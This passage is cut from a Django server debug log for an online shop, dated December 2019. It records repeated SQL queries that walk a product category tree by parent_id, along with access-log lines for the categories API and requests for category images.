140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 14:08:39,280 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 14:08:39,282 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 14:08:39,285 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 14:08:39,288 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 14:08:39,290 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 14:08:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 14:08:39] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [16/Dec/2019 14:08:40] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:08:40] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-16 14:08:54,600 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 14:08:54,610 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 14:08:54,615 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 14:08:54,618 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 14:08:54,623 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 14:08:54,627 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 14:08:54,630 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 14:08:54,634 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 14:08:54,637 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 14:08:54,641 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 14:08:54,644 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 14:08:54,647 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 14:08:54,650 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 14:08:54,653 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 14:08:54,658 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 14:08:54,660 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 14:08:54,663 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 14:08:54,666 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 14:08:54,669 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 14:08:54,674 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 14:08:54,677 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 14:08:54,680 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 14:08:54,683 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 14:08:54,687 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 14:08:54,690 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 14:08:54,694 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 14:08:54,697 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 14:08:54,700 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 14:08:54,703 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 14:08:54,706 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 14:08:54,710 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 14:08:54,713 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 14:08:54,716 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 14:08:54,719 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 14:08:54,722 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 14:08:54,727 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 14:08:54,730 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 14:08:54,733 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 14:08:54,736 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 14:08:54,739 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 14:08:54,742 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 14:08:54,745 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 14:08:54,748 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 14:08:54,751 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 14:08:54,755 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 14:08:54,758 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 14:08:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 14:08:55] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [16/Dec/2019 14:08:55] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [16/Dec/2019 14:08:55] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [16/Dec/2019 14:08:55] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [16/Dec/2019 14:08:55] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [16/Dec/2019 14:08:55] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [16/Dec/2019 14:09:04] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [16/Dec/2019 14:09:04] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [16/Dec/2019 14:09:05] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [16/Dec/2019 14:09:05] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [16/Dec/2019 14:09:05] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [16/Dec/2019 14:09:05] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 DEBUG 2019-12-16 14:09:46,129 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 14:09:46,138 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 14:09:46,144 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 14:09:46,147 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 14:09:46,152 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 14:09:46,156 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 14:09:46,160 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 14:09:46,164 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 14:09:46,167 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 14:09:46,172 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 14:09:46,175 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 14:09:46,178 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 